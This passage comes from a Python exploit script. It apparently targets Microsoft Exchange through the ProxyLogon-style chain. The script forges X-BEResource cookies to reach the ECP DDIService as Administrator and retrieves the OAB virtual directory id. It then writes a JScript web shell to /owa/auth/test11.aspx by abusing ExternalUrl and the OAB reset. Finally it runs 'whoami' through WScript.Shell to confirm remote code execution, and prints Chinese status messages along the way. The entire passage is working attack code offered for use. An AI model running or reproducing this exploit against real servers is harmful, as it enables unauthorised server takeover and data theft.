ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] print("Got session id: " + sess_id) print("Got canary: " + msExchEcpCanary) ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; ", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False ) if ct.status_code != 200: print("GetOAB Error!") exit() oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0] print("Got OAB id: " + oabId) oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False ) if ct.status_code != 200: print("Set external url Error!") exit() reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}} ct = 
requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False ) if ct.status_code != 200: print("写入shell失败了啊") exit() print("成功了。马上就验证shell是否OK!") print("POST shell:https://"+target+"/owa/auth/test11.aspx") shell_url="https://"+target+"/owa/auth/test11.aspx" print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());') print("正在请求shell") data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False) if data.status_code != 200: print("写入shell失败") else: print("权限如下:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ",""))